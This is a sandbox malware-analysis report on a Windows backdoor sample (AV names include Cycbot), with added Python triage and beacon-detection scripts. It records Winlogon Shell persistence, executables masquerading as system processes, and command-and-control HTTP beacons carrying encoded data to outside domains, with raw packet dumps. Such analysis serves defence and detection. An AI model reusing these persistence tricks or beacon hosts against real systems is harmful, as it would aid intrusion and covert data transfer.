Analysis Date: 2015-01-15 13:47:28
MD5: fccde3f34c18bb86a0c299d8ddd53a61
SHA1: 24ec1a86cc302afca67967bfc125923322edc5fe

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: 315f00ebed2aee8b4a9c2bf5a16b3650  sha1: b0b04e06f6306b24309fe393f4694a523e88bcf7  size: 110080
Section .tls    md5: 01727e1ba6688dc18254e9f60f68f5d2  sha1: 6a20a07fc302b5823d0715d58a22b32b9763f476  size: 1024
Section .data   md5: e3ab8a82d23e74c2ce3bfb868b506fa9  sha1: 3df43e4073bbf9d825eb2c12a91b12267ef100d9  size: 70656
Section .reloc  md5: a0f6fca3855ba1f80207be83aa7fd0c0  sha1: 79b917e1c928330f2fe601f9fb46021dfe336e18  size: 1024
Timestamp: 2005-11-09 23:59:43 (PE header compile time; this field is set by whoever built the binary and is routinely forged, so it is not evidence of the sample's age)
PEhash: c29cdfce897ead2d875a98107930d82a3639afd2
IMPhash: f789931b2b97f41e9be6e08058fda06e
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Variant.Kazy.36193
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): Gen:Variant.Kazy.36193
AV Authentium: W32/Goolbot.K.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV BullGuard: Gen:Variant.Kazy.36193
AV CA (E-Trust Ino): Win32/FakeAlert.J!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Win.Trojan.Cycbot-5427
AV Dr. Web: Trojan.DownLoader1.64291
AV Emsisoft: Gen:Variant.Kazy.36193
AV Eset (nod32): Win32/Kryptik.SMY
AV Fortinet: W32/Kryptik.SMY!tr.bdr
AV Frisk (f-prot): W32/Goolbot.K.gen!Eldorado
AV F-Secure: Gen:Variant.Kazy.36193
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Backdoor.Win32.Cycbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.s
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Variant.Kazy.36193
AV Rising: Trojan.Win32.Generic.1294D424
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen5
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex: {45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {F053D246-5CC9-46E9-9C51-723D87E9990B}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: wwwmediaportal.com
Winsock DNS: 127.0.0.1
Winsock DNS: realsoftwaredevelopment.com
Winsock DNS: coolmediaportal.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
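The host-side events above show three things a triage script should catch on any sandbox run: the Winlogon\Shell value gaining a second entry after explorer.exe, executables named after Windows system processes (csrss.exe, conhost.exe, dwm.exe) dropped and launched from the user profile and Temp instead of System32, and ProxyEnable being switched on under Internet Settings. The following is an added example, not part of the sandbox report: the event tuples are constructed from the Runtime Details listed above (plus one benign svchost.exe path as a control), and the rule set and the list of borrowed system-binary names are the editor's assumptions about what an analyst wants flagged, not behaviour the report itself asserts.

```python
import ntpath

# Constructed from the report's Runtime Details: (event kind, target, value).
# The final svchost.exe entry is a constructed benign control, not from the report.
EVENTS = [
    ("registry", r"HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable", "1"),
    ("registry", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",
     r"explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe"),
    ("file", r"C:\Documents and Settings\Administrator\Application Data\dwm.exe", None),
    ("file", r"C:\Documents and Settings\Administrator\Application Data\75DE.FFC", None),
    ("process", r"C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe", None),
    ("process", r"C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe", None),
    ("process", r"C:\WINDOWS\system32\svchost.exe", None),
]

# System-binary names that malware commonly borrows (assumption: the analyst's
# list, not something the report enumerates).
SYSTEM_BINARY_NAMES = {"csrss.exe", "conhost.exe", "dwm.exe", "svchost.exe",
                       "lsass.exe", "winlogon.exe", "explorer.exe"}

# Directories from which those names are expected (case-insensitive prefix match).
LEGIT_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\windows")


def winlogon_shell_extras(value):
    """Return every entry of a Winlogon\\Shell value other than the default explorer.exe."""
    parts = [p.strip() for p in value.split(",") if p.strip()]
    return [p for p in parts if p.lower() != "explorer.exe"]


def masquerades_system_binary(path):
    """True if PATH carries a system-binary name but does not live under a Windows directory."""
    name = ntpath.basename(path).lower()
    if name not in SYSTEM_BINARY_NAMES:
        return False
    directory = ntpath.dirname(path).lower()
    return not directory.startswith(LEGIT_DIRS)


def triage(events):
    """Apply the three rules and return a list of (rule, detail) findings in event order."""
    findings = []
    for kind, target, value in events:
        if kind == "registry":
            leaf = target.rsplit("\\", 1)[-1].lower()
            if leaf == "shell" and r"\winlogon" in target.lower():
                for extra in winlogon_shell_extras(value):
                    findings.append(("winlogon_shell_hijack", extra))
            elif leaf == "proxyenable" and value.strip() == "1":
                findings.append(("proxy_enabled", target))
        elif kind in ("file", "process") and masquerades_system_binary(target):
            findings.append(("system_name_outside_windows_dir", target))
    return findings


if __name__ == "__main__":
    for rule, detail in triage(EVENTS):
        print(f"{rule:32} {detail}")
```

Run against the constructed events this yields five findings: the ProxyEnable flip, the dwm.exe path appended to Winlogon\Shell, and the three dropped binaries named csrss.exe, conhost.exe and dwm.exe; the System32 svchost.exe control is not flagged. The Shell-value rule is deliberately strict (anything besides a bare explorer.exe is reported) because legitimate software has no business extending that value.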

Network Details:

DNS: realsoftwaredevelopment.com  Type: A  ➝ 104.28.8.83
DNS: realsoftwaredevelopment.com  Type: A  ➝ 104.28.9.83
DNS: zonedg.com  Type: A  ➝ 141.8.225.80
DNS: zonedg.com  Type: A  ➝ 141.8.225.80
DNS: wwwmediaportal.com  Type: A  ➝ 128.199.187.239
DNS: coolmediaportal.com  Type: A  (no answer recorded)
HTTP GET: http://realsoftwaredevelopment.com/WindowsLiveWriter/web-2_0_thumb_1.gif?v29=97&tq=gHZutDyMv5rJejDia9nrmsl6giWz%2BJZbVyA%3D
  User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxFKv975Xlm5G
  User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJsX%2BSNxFKv975Xlm5G
  User-Agent: mozilla/2.0
HTTP GET: http://wwwmediaportal.com/blog/images/3521.jpg?v9=33&tq=gKZEtzyMv5rJqxG1J42pzMffBvEp1ujbwvgS917V65rJqlLfgPiWW1cg
  User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
  User-Agent: mozilla/2.0
HTTP POST: http://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMf1kX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
  User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 104.28.8.83:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 128.199.187.239:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f57696e 646f7773 4c697665   GET /WindowsLive
0x00000010 (00016)   57726974 65722f77 65622d32 5f305f74   Writer/web-2_0_t
0x00000020 (00032)   68756d62 5f312e67 69663f76 32393d39   humb_1.gif?v29=9
0x00000030 (00048)   37267471 3d67485a 75744479 4d763572   7&tq=gHZutDyMv5r
0x00000040 (00064)   4a656a44 6961396e 726d736c 36676957   JejDia9nrmsl6giW
0x00000050 (00080)   7a253242 4a5a6256 79412533 44204854   z%2BJZbVyA%3D HT
0x00000060 (00096)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000070 (00112)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000080 (00128)   20726561 6c736f66 74776172 65646576    realsoftwaredev
0x00000090 (00144)   656c6f70 6d656e74 2e636f6d 0d0a4163   elopment.com..Ac
0x000000a0 (00160)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x000000b0 (00176)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x000000c0 (00192)   2e300d0a 0d0a                         .0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78464b76 39373558   JuX%2BSNxFKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000100 (00256)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000110 (00272)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000120 (00288)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000130 (00304)   0d0a                                  ..

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a73   OhLgjh88y%2BcoJs
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f333532 312e6a70 673f7639 3d333326   /3521.jpg?v9=33&
0x00000020 (00032)   74713d67 4b5a4574 7a794d76 35724a71   tq=gKZEtzyMv5rJq
0x00000030 (00048)   7847314a 3432707a 4d666642 76457031   xG1J42pzMffBvEp1
0x00000040 (00064)   756a6277 76675339 31375636 35724a71   ujbwvgS917V65rJq
0x00000050 (00080)   6c4c6667 50695757 31636720 48545450   lLfgPiWW1cg HTTP
0x00000060 (00096)   2f312e30 0d0a436f 6e6e6563 74696f6e   /1.0..Connection
0x00000070 (00112)   3a20636c 6f73650d 0a486f73 743a2077   : close..Host: w
0x00000080 (00128)   77776d65 64696170 6f727461 6c2e636f   wwmediaportal.co
0x00000090 (00144)   6d0d0a41 63636570 743a202a 2f2a0d0a   m..Accept: */*..
0x000000a0 (00160)   55736572 2d416765 6e743a20 6d6f7a69   User-Agent: mozi
0x000000b0 (00176)   6c6c612f 322e300d 0a0d0a6d 65210a20   lla/2.0....me!. 
0x000000c0 (00192)   2020203c 2f746974 6c653e0a 20203c2f      </title>.  </
0x000000d0 (00208)   68656164 3e0a2020 3c626f64 793e0a20   head>.  <body>. 
0x000000e0 (00224)   2020203c 68333e54 68697320 69732074      <h3>This is t
0x000000f0 (00240)   68652072 65616c2d 6d6f6465 20746573   he real-mode tes
0x00000100 (00256)   74207061 67652e2e 2e3c2f68 333e0a09   t page...</h3>..
0x00000110 (00272)   093c696d 67207372 633d226c 6f676f2e   .<img src="logo.
0x00000120 (00288)   67696622 3e0a2020 3c2f626f 64793e0a   gif">.  </body>.
0x00000130 (00304)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6564 672e636f 6d0d0a55   t: zonedg.com..U
0x000000f0 (00240)   7365722d 4167656e 743a206d 6f7a696c   ser-Agent: mozil
0x00000100 (00256)   6c612f32 2e300d0a 436f6e74 656e742d   la/2.0..Content-
0x00000110 (00272)   4c656e67 74683a20 300d0a43 6f6e6e65   Length: 0..Conne
0x00000120 (00288)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x00000130 (00304)   3c2f6874 6d6c3e0a                     </html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000100 (00256)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000110 (00272)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000120 (00288)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000130 (00304)   0d0a203c 703e4e6f 20737563 68206669   .. <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.
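Every request in the capture shares the same shape: a `tq=` query parameter carrying an opaque, base64-looking blob, a bare `mozilla/2.0` User-Agent that matches no real browser, GETs for image paths that carry that parameter, and zero-length POSTs to /index.html. The replies recorded above are a generic IIS "No such file or directory" page and a hosting-provider test page, so at analysis time the servers were not answering as a controller; the request shape, not the response, is the usable network indicator. The following is an added example, not part of the sandbox report: it decodes the report's own hex-dump format back into bytes (the first GET and the first POST from the Raw Pcap section are copied in verbatim as sample input), parses the HTTP request, and applies those four indicators. The indicator names and thresholds are the editor's assumptions, not something the report states.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Copied from the report's Raw Pcap section: the first GET and the first POST.
DUMP_GET = """\
0x00000000 (00000)   47455420 2f57696e 646f7773 4c697665   GET /WindowsLive
0x00000010 (00016)   57726974 65722f77 65622d32 5f305f74   Writer/web-2_0_t
0x00000020 (00032)   68756d62 5f312e67 69663f76 32393d39   humb_1.gif?v29=9
0x00000030 (00048)   37267471 3d67485a 75744479 4d763572   7&tq=gHZutDyMv5r
0x00000040 (00064)   4a656a44 6961396e 726d736c 36676957   JejDia9nrmsl6giW
0x00000050 (00080)   7a253242 4a5a6256 79412533 44204854   z%2BJZbVyA%3D HT
0x00000060 (00096)   54502f31 2e300d0a 436f6e6e 65637469   TP/1.0..Connecti
0x00000070 (00112)   6f6e3a20 636c6f73 650d0a48 6f73743a   on: close..Host:
0x00000080 (00128)   20726561 6c736f66 74776172 65646576    realsoftwaredev
0x00000090 (00144)   656c6f70 6d656e74 2e636f6d 0d0a4163   elopment.com..Ac
0x000000a0 (00160)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x000000b0 (00176)   4167656e 743a206d 6f7a696c 6c612f32   Agent: mozilla/2
0x000000c0 (00192)   2e300d0a 0d0a                         .0....
"""

DUMP_POST = """\
0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   316b5825 32425039 68253242 49307344   1kX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78464b76 39373558   JuX%2BSNxFKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6564672e 636f6d0d   ost: zonedg.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 206d6f7a   .User-Agent: moz
0x00000100 (00256)   696c6c61 2f322e30 0d0a436f 6e74656e   illa/2.0..Conten
0x00000110 (00272)   742d4c65 6e677468 3a20300d 0a436f6e   t-Length: 0..Con
0x00000120 (00288)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000130 (00304)   0d0a                                  ..
"""

# One dump line: offset, decimal offset in parentheses, then up to eight hex groups.
# The trailing ASCII column is separated by at least three spaces, so the greedy
# group cannot run into it.
HEX_LINE = re.compile(r"^0x[0-9a-f]{8} \(\d+\)\s+((?:[0-9a-f]{2,8} ?)+)", re.I)


def decode_dump(dump):
    """Reassemble the hex columns of a sandbox dump into the raw bytes on the wire."""
    out = bytearray()
    for line in dump.splitlines():
        m = HEX_LINE.match(line)
        if m:
            out += bytes.fromhex(m.group(1).replace(" ", ""))
    return bytes(out)


def parse_request(raw):
    """Split an HTTP request into method, target, version, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def beacon_indicators(req):
    """Return the names of the beacon indicators a parsed request matches."""
    hits = []
    parts = urlsplit(req["target"])
    params = parse_qs(parts.query)
    if req["headers"].get("user-agent", "").lower() == "mozilla/2.0":
        hits.append("bare_mozilla_2.0_user_agent")
    if "tq" in params:
        hits.append("tq_query_parameter")
        if parts.path.lower().endswith((".gif", ".jpg", ".png")):
            hits.append("image_path_carrying_tq")
    if req["method"] == "POST" and req["headers"].get("content-length") == "0":
        hits.append("zero_length_post")
    return hits


if __name__ == "__main__":
    for dump in (DUMP_GET, DUMP_POST):
        req = parse_request(decode_dump(dump))
        print(req["method"], req["headers"].get("host"), beacon_indicators(req))
```

Matching on the exact string `mozilla/2.0` is intentional: the value is a constant here, and a looser pattern such as "contains Mozilla" would match every browser. The `tq` blob itself is left opaque; nothing on the page supports a claim about its encoding beyond it being URL-encoded base64-alphabet text, so the indicator is its presence, not its contents.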


Strings
1
.W.m.W.
...
(
r
.
.
...2.~j
.BL.
>.m

080904b0
1.0.0.1
1532
&All Exit        Shift+C
&exit
FileVersion
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
``````
^^^^^^
~~~~~~
~~~~~~~~~~~
~~~~~~~~########
======
=========
================
====$$$$$
>>>>>>
>>>>>>>
>>>>>>>>>))
>>"%;,
||||||
 `,@`$
____________
,,,,,,
;;;;;;;
;;;;;;;;;;;;
;;;;;;;;;;;;;;
:::::::
!!!!!!!!!!!!!
/^^^^^^
//////
'''''''''''
'''']]]]
'''%%%%%%
""""""
"""%%%
(((((((((((((((
)))))))
))))))))
[[[[[[
]]]][[[[[[[[[
]]]]]]
{{{{{{
*`@$@ 
********
**********
\\\\\\\
&~~~~~~
#########
%%""""""
+++++++
+++++++++++
																
`````0
000000
00000000000000000000
?0*}~6]
<0pzer
0Wy@|*
11....
#%11111
]1 `@Q
2}}}}}}}}}}}}}>>
|||||||||||222222/
22222221
[22222222222222888
2+++++JD
/2UT)A
:3*1x-
333HHHH[
36, @Mh
`:|4&@`}\.``
444444
444444														
4444444444444
4F}u=~g
4K	0H-
4p6H3|9
4Y7assk
5bbbbbb
5bOLuk
 5&  FI! 
5,J%3o
%@5O\X{
5w9AeTy
5/.^:w}F<
66666,,,,,,,,
66666644
666666666
666kkkkkkkkkkk
69#+w+
_6b* @
	6buS#
6(IRVU
6:;K o
6V+zZiX
6Z"G:E
& `')7
=777<<<<<<___
77777777
7777777777
7%bzLy
7$cStR
/7.` DX
7gCt#.
7;lKIx
@7oU	t
|7x'' 
888866666
@@@@@@@@@@@@8888888
88888888888888
888888888888VV
&  8)AmXh
$8f!Th
&&|8gQ
8p(Kk(
8X*` ?X,
 944A"
@@97gd=
99999jmmmmm
=9LbZ9z
9S7s,@ E
'a1a}y
aaaa\\\\\\\\
AAAAAAAllllllllllllllllllll
aaaaaennnnnn
aa[[*******g
[ADaP~
ADVAPI32.dll
AHUEnQ
-AHWl~
@]a'Jf
aJrXv6#
aP+&@ 
,aPien
b??????___
B2%s2,  
BBBBB$$$
@@@@@@@@@@bbbbbbbbb
bbbbbbJJJJJJJJJ]]]]]BB
'@BBY MC
^^^^^^bccccccc
BCE^(~
b(  E1
